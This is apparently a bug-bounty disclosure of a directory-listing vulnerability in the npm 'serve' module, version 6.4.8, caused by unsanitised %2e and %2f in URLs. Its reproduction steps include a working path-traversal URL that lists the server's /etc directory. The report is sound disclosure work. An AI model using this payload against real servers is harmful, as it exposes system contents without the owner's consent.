Node.js third-party modules: [serve] Directory index of arbitrary folder available due to lack of sanitization of %2e and %2f characters in url

Hi,

This report is about Arbitrary Directory Listing vulnerability I found in serve module.
Vulnerability does not allow to open arbitrary file due to send module which handles file reading and implements its own validation and protection against Path Traversal attacks.

However serve handles directory listing on its own and does not protect against listing of any directory on the remote server.

Module:

Serve is a module which allows to server static files and browse directories in the browser. The vulnerability exists in the latest available version (6.4.8)

Link to npm page: https://www.npmjs.com/package/serve

Summary:

Serve does not handle %2e (.) and %2f (/) and allows to use them in paths, which can be used do go up through directory tree and lists content of any directory.

Steps To Reproduce:

• install serve

$ npm install serve

• create simple application which uses http-pages for serving static files from local server:

const serve = require('serve')

const server = serve(__dirname, {
    port: 4444,
    ignore: []
})

• run application:

$ node app.js

• open the browser and go to http://localhost:4444 You should see all directories and files in the directory, where app.js was run:

{F256095}

• now, open the following url: http://localhost:4444/..%2f/..%2f/..%2f/..%2f/etc/ (please adjust the number of …%2f/ to reflect your system). You’ll be able to see the content of /etc directory:

{F256096}

Supporting Material/References:

Configuration I’ve used to find this vulnerability:

• macOS HighSierra 10.13.2
• node 8.9.3
• npm 5.5.1
• curl 7.54.0

Wrap up

I hope this report will help to keep Node ecosystem more safe. If you have any questions about any details of this finding, please let me know in comment.

Thank you

Regards,

Rafal ‘bl4de’ Janicki

Impact

This vulnerability allows malisious user to list content of any directory on the remote machine, where serve runs. Although it’s not enough to open and read arbitrary files, this still might expose some sensitive information which can be used in different attacks.